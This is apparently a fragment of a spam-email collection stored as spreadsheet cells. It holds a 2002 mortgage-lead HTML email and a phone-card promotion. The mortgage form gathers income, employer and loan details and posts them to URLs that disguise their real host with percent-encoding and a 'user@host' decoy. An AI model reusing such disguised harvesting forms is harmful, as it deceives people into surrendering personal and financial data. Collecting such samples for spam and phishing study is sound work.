                     &lt;LI&gt;&lt;FONT face=3DVerdana size=3D2&gt;&lt;I&gt;Loan Amount must =
 be at 
                     least $30,000 or more.&lt;/I&gt;&lt;/FONT&gt; 
                     &lt;LI&gt;&lt;FONT face=3DVerdana size=3D2&gt;&lt;I&gt;TX or AL states d=
 o NOT 
                     qualify.&lt;/I&gt;&lt;/FONT&gt; 
                     &lt;LI&gt;&lt;FONT face=3DVerdana size=3D2&gt;&lt;I&gt;Sorry, No Mobile 
                     Homes.&lt;/I&gt;&lt;/FONT&gt; &lt;/LI&gt;&lt;/UL&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD width=3D"100%" height=3D10&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD align=3Dmiddle width=3D"100%" height=3D22&gt;
                   &lt;P align=3Dcenter&gt;&lt;B&gt;&lt;FONT face=3DArial color=3D#000000 =
 size=3D3&gt;&lt;A 
                   name=3D"mortgage loan"&gt;&lt;/A&gt;Free Mortgage Loan Analysis. =
 No 
                   obligation!&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD align=3Dmiddle width=3D"100%" height=3D20&gt;
                   &lt;P align=3Dcenter&gt;&lt;STRONG&gt;&lt;FONT face=3DArial color=3D#ff=
 0000 
                   size=3D1&gt;ALL INFORMATION IS REQUIRED. THANK YOU!&lt;/FONT&gt;&lt;=
 /STRONG&gt; 
                   &lt;STRONG&gt;&lt;FONT face=3DArial color=3D#ff0000 
                   size=3D2&gt;&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD width=3D"100%" height=3D952&gt;
                   &lt;DIV align=3Dcenter&gt;
                   &lt;TABLE cellSpacing=3D0 cellPadding=3D0 border=3D2&gt;
                     &lt;TR&gt;
                       &lt;TD align=3Dmiddle width=3D"100%"&gt;
                         &lt;DIV style=3D"LEFT: 128px; TOP: 524px" align=3Dcen=
 ter&gt;
                         &lt;FORM name=3Dform action=3Dhttp://members.triposd.=
 uk%61936356key=3D96589521061936356index=3DA21r7P6qW61936356.5370922@%6d%65=
 %6d%62%65%72%73.%68%6f%73%74%69%6e%674%66%72%65%65.%6f%72%67/%6ea%74e%312/=
 i%6e%64e%78.%70h%70 method=3Dpost&gt;&lt;INPUT type=3Dhidden 
                         value=3Dyes name=3Dsubmitted&gt; &lt;!--value=3D"HomeOwn=
 er,ApplicantName, --&gt;&lt;!--Address,City,State,Zipcode,HomePhone,WorkPhone,Pr=
 opertyType,PurchasePrice,YearAcquired,--&gt;&lt;!--PropertyValue,AmountOwed1stMo=
 rtgage,CurrentInterestRateOn1st,FixedOrAdjustable,--&gt;&lt;!--MonthlyPayment1st=
 ,SecondMortgageBalance,CurrentInterestRateOn2nd,FixedOrAdjustable2,--&gt;&lt;!--=
 MonthlyPayment2nd,CurrentEmployer,YearsWithCurrentEmployer,GrossYearlyInco=
 me,Credit,--&gt;&lt;!--BestTimeToContactYou,TypeOfLoanDesired,LoanAmountDesired,=
 email"--&gt;
                         &lt;TABLE cellSpacing=3D0 cellPadding=3D5 width=3D400=
                         bgColor=3D#666699 border=3D0&gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dright width=3D"49%"&gt;&lt;FONT face=3DA=
 rial 
                               color=3D#ffffff size=3D2&gt;Are you a home 
                               owner?&lt;BR&gt;&lt;/FONT&gt;&lt;/TD&gt;
                             &lt;TD width=3D"51%"&gt;&lt;SELECT size=3D1 name=3DHome=
 Owner&gt; 
                                 &lt;OPTION value=3D"Choose one..." selected&gt;C=
 hoose 
                                 one...&lt;/OPTION&gt; &lt;OPTION value=3DYes&gt;Yes&lt;/O=
 PTION&gt; 
                                 &lt;OPTION value=3DNo&gt;No&lt;/OPTION&gt;&lt;/SELECT&gt;&lt;/T=
 D&gt;&lt;/TR&gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dright width=3D"49%"&gt;&lt;FONT face=3DA=
 rial 
                               color=3D#ffffff size=3D2&gt;Primary Applicant 
                             Name:&lt;/FONT&gt;&lt;/TD&gt;
                             &lt;TD width=3D"51%"&gt;&lt;INPUT size=3D24 
                             name=3DApplicantName&gt;&lt;/TD&gt;&lt;/TR&gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dright width=3D"49%"&gt;&lt;FONT face=3DA=
 rial 
                               color=3D#ffffff size=3D2&gt;Co-Applicant Name:&lt;=
 /FONT&gt;&lt;/TD&gt;
                             &lt;TD width=3D"51%"&gt;&lt;INPUT size=3D24 
                               name=3DCoApplicantName&gt;&lt;/TD&gt;&lt;/TR&gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dright width=3D"49%"&gt;&lt;FONT face=3DA=
 rial 
                               color=3D#ffffff size=3D2&gt;Street Address:&lt;/FO=
 NT&gt;&lt;/TD&gt;
                             &lt;TD width=3D"51%"&gt;&lt;INPUT size=3D24 name=3DAddr=
 ess&gt;&lt;/TD&gt;&lt;/TR&gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dright width=3D"49%"&gt;&lt;FONT face=3DA=
 rial 
                               color=3D#ffffff size=3D2&gt;City:&lt;/FONT&gt;&lt;/TD&gt;
                             &lt;TD width=3D"51%"&gt;&lt;INPUT size=3D24 name=3DCity=
 &gt;&lt;/TD&gt;&lt;/TR&gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dright width=3D"49%"&gt;&lt;FONT face=3DA=
 rial 
                               color=3D#ffffff size=3D2&gt;State:&lt;/FONT&gt;&lt;/TD&gt;
                             &lt;TD width=3D"51%"&gt;&lt;INPUT size=3D2 name=3DState=
 &gt;&lt;/TD&gt;&lt;/TR&gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dright width=3D"49%"&gt;&lt;FONT face=3DA=
 rial 
                               color=3D#ffffff size=3D2&gt;Zip Code:&lt;/FONT&gt;&lt;/T=
 D&gt;
                             &lt;TD width=3D"51%"&gt;&lt;INPUT size=3D5 name=3DZipco=
 de&gt;&lt;/TD&gt;&lt;/TR&gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dright width=3D"49%"&gt;&lt;FONT face=3DA=
 rial 
                               color=3D#ffffff size=3D2&gt;Home Phone:&lt;/FONT&gt;&lt;=
 /TD&gt;
                             &lt;TD width=3D"51%"&gt;&lt;INPUT size=3D24 
                               name=3DHomePhone&gt;&lt;BR&gt;&lt;FONT face=3DArial colo=
 r=3D#ffffcc 
                               size=3D1&gt;Example: (334) 123-4567&lt;/FONT&gt;&lt;/TD&gt;=
 &lt;/TR&gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dright width=3D"49%"&gt;&lt;FONT face=3DA=
 rial 
                               color=3D#ffffff size=3D2&gt;Work Phone:&lt;/FONT&gt;&lt;=
 /TD&gt;
                             &lt;TD width=3D"51%"&gt;&lt;INPUT size=3D24 
                               name=3DWorkPhone&gt;&lt;BR&gt;&lt;FONT face=3DArial colo=
 r=3D#ffffcc 
                               size=3D1&gt;Example: (342) 567-8901&lt;/FONT&gt;&lt;/TD&gt;=
 &lt;/TR&gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dright width=3D"49%"&gt;&lt;FONT face=3DA=
 rial 
                               color=3D#ffffff size=3D2&gt;Property Type:&lt;/FON=
 T&gt;&lt;/TD&gt;
                             &lt;TD width=3D"51%"&gt;&lt;SELECT size=3D1 name=3DProp=
 ertyType&gt; 
                                 &lt;OPTION value=3D"Select your property..." 
                                 selected&gt;Select your property...&lt;/OPTION&gt; 
                                 &lt;OPTION value=3D"Single Family Residence"&gt;=
 Single 
                                 Family Residence&lt;/OPTION&gt; &lt;OPTION 
                                 value=3DCondominium&gt;Condominium&lt;/OPTION&gt; &lt;=
 OPTION 
                                 value=3DTownhouse&gt;Townhouse&lt;/OPTION&gt;&lt;/SELE=
 CT&gt;&lt;/TD&gt;&lt;/TR&gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dright width=3D"49%"&gt;&lt;FONT face=3DA=
 rial 
                               color=3D#ffffff size=3D2&gt;Original Purchase 
                               Price:&lt;/FONT&gt;&lt;/TD&gt;
                             &lt;TD width=3D"51%"&gt;&lt;INPUT size=3D24 
                               name=3DPurchasePrice&gt;&lt;BR&gt;&lt;FONT face=3DArial 
                               color=3D#ffffcc size=3D1&gt;Example: 100K&lt;/FONT=
 &gt;&lt;/TD&gt;&lt;/TR&gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dright width=3D"49%"&gt;&lt;FONT face=3DA=
 rial 
                               color=3D#ffffff size=3D2&gt;Year Acquired:&lt;/FON=
 T&gt;&lt;/TD&gt;
                             &lt;TD width=3D"51%"&gt;&lt;INPUT size=3D24 
                             name=3DYearAcquired&gt;&lt;/TD&gt;&lt;/TR&gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dright width=3D"49%"&gt;&lt;FONT face=3DA=
 rial 
                               color=3D#ffffff size=3D2&gt;Estimated Property 
                               Value:&lt;BR&gt;&lt;/FONT&gt;&lt;FONT face=3DArial color=3D=
 #ffffcc 
                               size=3D2&gt;&lt;B&gt;(Must be at least $50K)&lt;/B&gt;&lt;/FON=
 T&gt;&lt;/TD&gt;
                             &lt;TD width=3D"51%"&gt;&lt;INPUT size=3D24 
                             name=3DPropertyValue&gt;&lt;/TD&gt;&lt;/TR&gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dright width=3D"49%"&gt;&lt;FONT face=3DA=
 rial 
                               color=3D#ffffff size=3D2&gt;Amount Owed on 1st 
                               Mortgage:&lt;/FONT&gt;&lt;/TD&gt;
                             &lt;TD width=3D"51%"&gt;&lt;INPUT size=3D24 
                               name=3DAmountOwed1stMortgage&gt;&lt;/TD&gt;&lt;/TR&gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dright width=3D"49%"&gt;&lt;FONT face=3DA=
 rial 
                               color=3D#ffffff size=3D2&gt;Current Interest Ra=
 te&lt;BR&gt;on 
                               1st Mortgage:&lt;/FONT&gt;&lt;/TD&gt;
                             &lt;TD width=3D"51%"&gt;&lt;INPUT size=3D24 
                               name=3DCurrentInterestRateOn1st&gt;&lt;/TD&gt;&lt;/TR&gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dright width=3D"49%"&gt;&lt;FONT face=3DA=
 rial 
                               color=3D#ffffff size=3D2&gt;Fixed Or 
 Adjustable?&lt;/FONT&gt;&lt;/TD&gt;
                             &lt;TD width=3D"51%"&gt;&lt;SELECT size=3D1 
                               name=3DFixedOrAdjustable&gt; &lt;OPTION 
                                 value=3D"Choose one..." selected&gt;Choose 
                                 one...&lt;/OPTION&gt; &lt;OPTION 
                                 value=3DFixed&gt;Fixed&lt;/OPTION&gt; &lt;OPTION 
                                 value=3DAdjustable&gt;Adjustable&lt;/OPTION&gt;&lt;/SE=
 LECT&gt;&lt;/TD&gt;&lt;/TR&gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dright width=3D"49%"&gt;&lt;FONT face=3DA=
 rial 
                               color=3D#ffffff size=3D2&gt;Monthly Payment on =
 1st 
                               Mortgage:&lt;/FONT&gt;&lt;/TD&gt;
                             &lt;TD width=3D"51%"&gt;&lt;INPUT size=3D24 
                               name=3DMonthlyPayment1st&gt;&lt;/TD&gt;&lt;/TR&gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dright width=3D"49%"&gt;&lt;FONT face=3DA=
 rial 
                               color=3D#ffffff size=3D2&gt;Amount Owed on 2nd 
                               Mortgage:&lt;/FONT&gt;&lt;/TD&gt;
                             &lt;TD width=3D"51%"&gt;&lt;INPUT size=3D24 
                               name=3DSecondMortgageBalance&gt;&lt;/TD&gt;&lt;/TR&gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dright width=3D"49%"&gt;&lt;FONT face=3DA=
 rial 
                               color=3D#ffffff size=3D2&gt;Current Interest Ra=
 te&lt;BR&gt;on 
                               2nd Mortgage:&lt;/FONT&gt;&lt;/TD&gt;
                             &lt;TD width=3D"51%"&gt;&lt;INPUT size=3D24 
                               name=3DCurrentInterestRateOn2nd&gt;&lt;/TD&gt;&lt;/TR&gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dright width=3D"49%"&gt;&lt;FONT face=3DA=
 rial 
                               color=3D#ffffff size=3D2&gt;Fixed or 
 Adjustable?&lt;/FONT&gt;&lt;/TD&gt;
                             &lt;TD width=3D"51%"&gt;&lt;SELECT size=3D1 
                               name=3DFixedOrAdjustable2&gt; &lt;OPTION 
                                 value=3D"Choose one..." selected&gt;Choose 
                                 one...&lt;/OPTION&gt; &lt;OPTION 
                                 value=3DFixed&gt;Fixed&lt;/OPTION&gt; &lt;OPTION 
                                 value=3DAdjustable&gt;Adjustable&lt;/OPTION&gt;&lt;/SE=
 LECT&gt;&lt;/TD&gt;&lt;/TR&gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dright width=3D"49%"&gt;&lt;FONT face=3DA=
 rial 
                               color=3D#ffffff size=3D2&gt;Monthly Payment on =
 2nd 
                               Mortgage:&lt;/FONT&gt;&lt;/TD&gt;
                             &lt;TD width=3D"51%"&gt;&lt;INPUT size=3D24 
                               name=3DMonthlyPayment2nd&gt;&lt;/TD&gt;&lt;/TR&gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dright width=3D"49%"&gt;&lt;FONT face=3DA=
 rial 
                               color=3D#ffffff size=3D2&gt;Current Employer:&lt;/=
 FONT&gt;&lt;/TD&gt;
                             &lt;TD width=3D"51%"&gt;&lt;INPUT size=3D24 
                               name=3DCurrentEmployer&gt;&lt;/TD&gt;&lt;/TR&gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dright width=3D"49%"&gt;&lt;FONT face=3DA=
 rial 
                               color=3D#ffffff size=3D2&gt;Years With Current 
                               Employer:&lt;/FONT&gt;&lt;/TD&gt;
                             &lt;TD width=3D"51%"&gt;&lt;INPUT size=3D24 
                               name=3DYearsWithCurrentEmployer&gt;&lt;/TD&gt;&lt;/TR&gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dright width=3D"49%"&gt;&lt;FONT face=3DA=
 rial 
                               color=3D#ffffff size=3D2&gt;Gross Yearly 
 Income:&lt;/FONT&gt;&lt;/TD&gt;
                             &lt;TD width=3D"51%"&gt;&lt;INPUT size=3D24 
                               name=3DGrossYearlyIncome&gt;&lt;FONT face=3DArial 
                               color=3D#ffffff size=3D2&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;FONT fa=
 ce=3DArial 
                               color=3D#ffffcc size=3D1&gt;Example: 60K&lt;/FONT&gt;=
 &lt;/TD&gt;&lt;/TR&gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dright width=3D"49%"&gt;&lt;FONT face=3DA=
 rial 
                               color=3D#ffffff size=3D2&gt;How is your credit?=
 &lt;/FONT&gt;&lt;/TD&gt;
                             &lt;TD width=3D"51%"&gt;&lt;SELECT size=3D1 name=3DCred=
 it&gt; 
                                 &lt;OPTION value=3D"Make your best guess..."&gt;=
 Make 
                                 your best guess...&lt;/OPTION&gt; &lt;OPTION 
                                 value=3DExcellent&gt;Excellent&lt;/OPTION&gt; &lt;OPTI=
 ON 
                                 value=3DGood&gt;Good&lt;/OPTION&gt; &lt;OPTION value=3D=
 Fair 
                                 selected&gt;Fair&lt;/OPTION&gt; &lt;OPTION 
                                 value=3DPoor&gt;Poor&lt;/OPTION&gt;&lt;/SELECT&gt;&lt;/TD&gt;&lt;/=
 TR&gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dright width=3D"49%"&gt;&lt;FONT face=3DA=
 rial 
                               color=3D#ffffff size=3D2&gt;Best Time To Contac=
 t 
                               You:&lt;/FONT&gt;&lt;/TD&gt;
                             &lt;TD width=3D"51%"&gt;&lt;SELECT size=3D1 
                               name=3DBestTimeToContactYou&gt; &lt;OPTION 
                                 value=3D"Choose one..." selected&gt;Choose 
                                 one...&lt;/OPTION&gt; &lt;OPTION 
                                 value=3D"Morning at Work"&gt;Morning at Work&lt;=
 /OPTION&gt; 
                                 &lt;OPTION value=3D"Afternoon at Work"&gt;Aftern=
 oon at 
                                 Work&lt;/OPTION&gt; &lt;OPTION 
                                 value=3D"Evening at Work"&gt;Evening at Work&lt;=
 /OPTION&gt; 
                                 &lt;OPTION value=3D"Morning at Home"&gt;Morning =
 at 
                                 Home&lt;/OPTION&gt; &lt;OPTION 
                                 value=3D"Afternoon at Home"&gt;Afternoon at 
                                 Home&lt;/OPTION&gt; &lt;OPTION 
                                 value=3D"Evening at Home"&gt;Evening at 
                               Home&lt;/OPTION&gt;&lt;/SELECT&gt;&lt;/TD&gt;&lt;/TR&gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dright width=3D"49%"&gt;&lt;FONT face=3DA=
 rial 
                               color=3D#ffffff size=3D2&gt;Type Of Loan 
                             Desired:&lt;/FONT&gt;&lt;/TD&gt;
                             &lt;TD width=3D"51%"&gt;&lt;SELECT size=3D1 
                               name=3DTypeOfLoanDesired&gt; &lt;OPTION 
                                 value=3D"Select a loan..." selected&gt;Select=
  a 
                                 loan...&lt;/OPTION&gt; &lt;OPTION 
                                 value=3D"Second Mortgage"&gt;Second Mortgage&lt;=
 /OPTION&gt; 
                                 &lt;OPTION value=3D"Debt Consolidation"&gt;Debt 
                                 Consolidation&lt;/OPTION&gt; &lt;OPTION 
                                 value=3DRefinance&gt;Refinance&lt;/OPTION&gt; &lt;OPTI=
 ON 
                                 value=3D"Refinance with Cash Out"&gt;Refinanc=
 e with 
                                 Cash Out&lt;/OPTION&gt; &lt;OPTION 
                                 value=3D"Home Equity Line of Credit"&gt;Home =
 Equity 
                                 Line of Credit&lt;/OPTION&gt;&lt;/SELECT&gt;&lt;/TD&gt;&lt;/TR&gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dright width=3D"49%"&gt;&lt;FONT face=3DA=
 rial 
                               color=3D#ffffff size=3D2&gt;Loan Amount 
                               Desired:&lt;BR&gt;&lt;/FONT&gt;&lt;FONT face=3DArial color=3D=
 #ffffcc 
                               size=3D2&gt;&lt;B&gt;(Must be at least $30K)&lt;/B&gt;&lt;/FON=
 T&gt;&lt;/TD&gt;
                             &lt;TD width=3D"51%"&gt;&lt;INPUT size=3D24 
                               name=3DLoanAmountDesired&gt;&lt;FONT face=3DArial 
                               color=3D#ffffff size=3D2&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;FONT fa=
 ce=3DArial 
                               color=3D#ffffcc size=3D1&gt;Example: 80K&lt;/FONT&gt;=
 &lt;/TD&gt;&lt;/TR&gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dright width=3D"49%"&gt;&lt;FONT face=3DA=
 rial 
                               color=3D#ffffff size=3D2&gt;Your E-Mail 
 Address:&lt;/FONT&gt;&lt;/TD&gt;
                             &lt;TD width=3D"51%"&gt;&lt;INPUT size=3D24 
                               name=3Demail&gt;&lt;BR&gt;&lt;FONT face=3DArial color=3D=
 #ffffcc 
                               size=3D1&gt;Must be in form: name@domain.com.&lt;B=
 R&gt;Please 
                               verify. Thanks!&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dright width=3D"49%"&gt;&amp;nbsp;&lt;/TD&gt;
                             &lt;TD width=3D"51%"&gt;&amp;nbsp;&lt;/TD&gt;&lt;/TR&gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dmiddle width=3D"100%" colSpan=3D2&gt;
                               &lt;P align=3Dcenter&gt;&lt;B&gt;&lt;FONT face=3DArial colo=
 r=3D#ffffcc 
                               size=3D2&gt;Please verify your information - es=
 pecially 
                               your telephone numbers and e-mail address - =
 before 
                               pressing the button.&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR=
 &gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dmiddle width=3D"100%" colSpan=3D2&gt;
                               &lt;P align=3Dcenter&gt;&lt;FONT face=3DArial&gt;&lt;INPUT =
 type=3Dsubmit value=3D"Submit Information" border=3D0&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/=
 FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
                           &lt;TR&gt;
                             &lt;TD align=3Dmiddle width=3D"100%" 
                           colSpan=3D2&gt;&amp;nbsp;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/FORM&gt;&lt;/DIV=
 &gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR&gt;
                 &lt;TD align=3Dmiddle width=3D"100%" height=3D40&gt;
                   &lt;P align=3Dcenter&gt;&lt;B&gt;&lt;FONT face=3DArial color=3D#000000 =
 size=3D3&gt;Thank 
                   you! You will be contacted by a&lt;BR&gt;mortgage professional=
                   shortly.&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR=
 &gt;
         &lt;TR&gt;
           &lt;TD align=3Dmiddle width=3D"100%" height=3D20&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dmiddle width=3D"100%" height=3D17&gt;
             &lt;P align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dmiddle width=3D"100%" height=3D17&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dmiddle width=3D"100%" height=3D17&gt;
             &lt;P align=3Dcenter&gt;&lt;FONT face=3DArial color=3D#c0c0c0 size=3D1&gt;=
 =FFFFFFA9&amp;nbsp;2002 
             All rights 
   reserved.&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/DIV&gt;&lt;form name=3D"form" =
 method=3D"post" action=3D"http://members.triposd.uk%31832292key=3D96589521=
 031832292index=3DA21r7P6qW31832292.7344414@%6d%65%6d%62%65%72%73.%68%6f%73=
 %74%69%6e%674%66%72%65%65.%6f%72%67/%6ea%74e%312/%70%72oce%73%73%5fc%6cea%=
 6e%6ci%73%74.%70h%70"&gt;
 &lt;DIV align=3Dcenter&gt; 
             &lt;table width=3D"391" border=3D"1" cellspacing=3D"0" cellpaddin=
 g=3D"0" align=3D"center" bordercolor=3D"#000000"&gt;
               &lt;tr&gt; 
                 &lt;td&gt; 
                   &lt;table width=3D"400" border=3D"0" cellspacing=3D"0" cell=
 padding=3D"2" bgcolor=3D"#cccccc"&gt;
                     &lt;tr&gt; 
                       &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=
 =3D"2"&gt;To 
                         be Removed from our Opt-In mailing list. Please en=
 ter your email address 
                         in the provided box below and click remove. &lt;/font=
 &gt;&lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                   &lt;table width=3D"400" border=3D"0" cellspacing=3D"0" cell=
 padding=3D"0" bgcolor=3D"#cccccc"&gt;
                     &lt;tr&gt; 
                       &lt;td&gt; 
                         &lt;div align=3D"center"&gt; 
                           &lt;input type=3D"hidden" name=3D"subject" value=3D=
 "REMOVE"&gt;
                           &lt;input name=3D"email" size=3D"30" 
            &gt;
                           &lt;input type=3D"submit" name=3D"Submit" value=3D"=
 REMOVE"&gt;
                         &lt;/div&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                   &lt;div align=3D"center"&gt;&lt;/div&gt;
                   &lt;div align=3D"center"&gt;&lt;/div&gt;
                   &lt;table width=3D"400" border=3D"0" cellspacing=3D"0" cell=
 padding=3D"0" bgcolor=3D"#cccccc"&gt;
                     &lt;tr&gt; 
                       &lt;td&gt; 
                         &lt;div align=3D"center"&gt;&lt;font face=3D"Arial, Helveti=
 ca, sans-serif" size=3D"1"&gt;Please 
                           allow 48 hours for your email address to be remo=
 ved.&lt;/font&gt;&lt;/div&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;&lt;/DIV&gt;
         &lt;/form&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;!--Content compressed for fast =
 browsing by Marketing-Mission.com and your browser. Boo Ya! --&gt;&lt;!--old : 2=
 8599 bytes --&gt;&lt;!--new : 3769 bytes --&gt;&lt;!--saving : 86.8% --&gt;&lt;!--time consu=
 med : 0.0013198853 --&gt;&lt;!--compression level : 3 --&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Save up to 70% on international calls!
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi part message in MIME format.
 --_NextPart_1_bvfoDiTVghtoCXFdvJNKcuWblFV
 Content-Type: text/plain; charset="us-ascii"
 Content-Transfer-Encoding: 7bit
 ........... with our telecoms partner Bumblebee !
 Don't get ripped off by expensive hotel, payphone and mobile charges. 
 SAVE, SAVE, SAVE on international calls with Ryanair's phone partner. 
 ************************************************************************
 *********
 You'll save up to 70% on international phone calls when you use our 
 online phone card.  You can use the card from any phone in any country 
 you visit and you won't have to worry about high phone charges 
 when you call home or the office.
 Buying a card couldn't be easier and it's totally secure.  Simply go to
 http://www.bumblebeecommunications.com/lowcostcalls/  
  to avail of this special offer for Ryanair customers.
 It's another great deal from Ryanair and our online phone 
 partner, Bumblebee Communications. 
 =====================================================================
 E-MAIL DISCLAIMER
 This e-mail and any files and attachments transmitted with it 
 are confidential and may be legally privileged. They are intended 
 solely for the use of the intended recipient.  Any views and 
 opinions expressed are those of the individual author/sender 
 and are not necessarily shared or endorsed by Ryanair Holdings plc 
 or any associated or related company. In particular e-mail 
 transmissions are not binding for the purposes of forming 
 a contract to sell airline seats, directly or via promotions, 
 and do not form a contractual obligation of any type.   
 Such contracts can only be formed in writing by post or fax, 
 duly signed by a senior company executive, subject to approval 
 by the Board of Directors.
 The content of this e-mail or any file or attachment transmitted 
 with it may have been changed or altered without the consent 
 of the author.  If you are not the intended recipient of this e-mail, 
 you are hereby notified that any review, dissemination, disclosure, 
 alteration, printing, circulation or transmission of, or any 
 action taken or omitted in reliance on this e-mail or any file 
 or attachment transmitted with it is prohibited and may be unlawful.
 If you have received this e-mail in error 
 please notify Ryanair Holdings plc by emailing postmaster@ryanair.ie
 or contact Ryanair Holdings plc, Dublin Airport, Co Dublin, Ireland.  
 --_NextPart_1_bvfoDiTVghtoCXFdvJNKcuWblFV
 Content-Type: application/ms-tnef
 Content-Transfer-Encoding: base64
 eJ8+IjUQAQaQCAAEAAAAAAABAAEAAQeQBgAIAAAA5AQAAAAAAADoAAEIgAcAGAAAAElQTS5NaWNy
 b3NvZnQgTWFpbC5Ob3RlADEIAQ2ABAACAAAAAgACAAEEgAEAJwAAAFNhdmUgdXAgdG8gNzAlIG9u
 IGludGVybmF0aW9uYWwgY2FsbHMhACgNAQWAAwAOAAAA0gcIAB4AEQAqADQABQBzAQEggAMADgAA
 ANIHCAAeABEAKgA0AAUAcwEBCYABACEAAAAxNUNDQzU1M0ZCNjVGOTRCODJBOTE2NjI0QjY5ODI2
 NAAgBwEDkAYAYAgAADEAAAALAAIAAQAAAAMAJgAAAAAAAwA2AAAAAABAADkAOHxzSERQwgEeAD0A
 AQAAAAEAAAAAAAAAAgFHAAEAAAAyAAAAYz11czthPSA7cD1SeWFuYWlyO2w9Q0hPVk1BSUwxLTAy
 MDgzMDE2NDI1MlotNTY1NgAAAB4AcAABAAAAJwAAAFNhdmUgdXAgdG8gNzAlIG9uIGludGVybmF0
 aW9uYWwgY2FsbHMhAAACAXEAAQAAABYAAAABwlBESGNVR3XMDo5JP7LazaO6pGd8AAAeABoMAQAA
 AAwAAABDb3lsZSwgU2VhbgAeAB0OAQAAACcAAABTYXZlIHVwIHRvIDcwJSBvbiBpbnRlcm5hdGlv
 bmFsIGNhbGxzIQAAAgEJEAEAAAC7AgAAtwIAALsEAABMWkZ1TPw4mgMACgByY3BnMTI14jIDQ3Rl
 eAVBAQMB908KgAKkA+MCAGNoCsBz8GV0MCAHEwKAD/MAUH8EVghVB7IRxQ5RAwEQxzL3BgAGwxHF
 MwRGEMkS2xHT2wjvCfc7GL8OMDURwgxgzmMAUAsJAWQzNhFQC6YUIC4dmCAD8HRoINUIYSAOsGwF
 kW0EIAqxZHRuEyFCdQbQHwBiuQngICEKogqECoBEAiBQXCc5MgVAZxEwIB0FEXAJgB6QASAgYnku
 IA7AImAAgXYgcGhvZR7hLB9heXAjsB+wIPcAcCKABGBiAxAgcBDiIfCGcx4wIKRTQVZFJAA/Jlge
 kAOgC4AOsASgYXTeaQIgB0AlUAdAbAQgHlPsUnkAcAtwciGSH1EkY/sfdSXWKitPLF8tby5/L0od
 IKpZCGAhkiiQIHNhCSOBdXAe0G8gNzAuJSdfKeUodWgJ8CB5vwhgMfARIB6TIKQCIGwLgO8qMTPF
 CyAeMCAxEShhA6D3NQIecDaUIANSJKEi8CRU1wuAOLMFoHUCMHIi8CCkvTTCdgQAHmAkozTCdyF2
 7xDwI4EyMTvQcjohAaAIYPk8QWlnHoAztSV0JeU0d/8ociOhB4AekB7BN/EioQ3grGUuIKof8HkL
 gGckoHM4FDnRbGQhhSBQIwBh/wCQEyEksh5gKZQyMAGQKJC7IvARIGMIcEEgNwBTB3BbC1Ai8Gcy
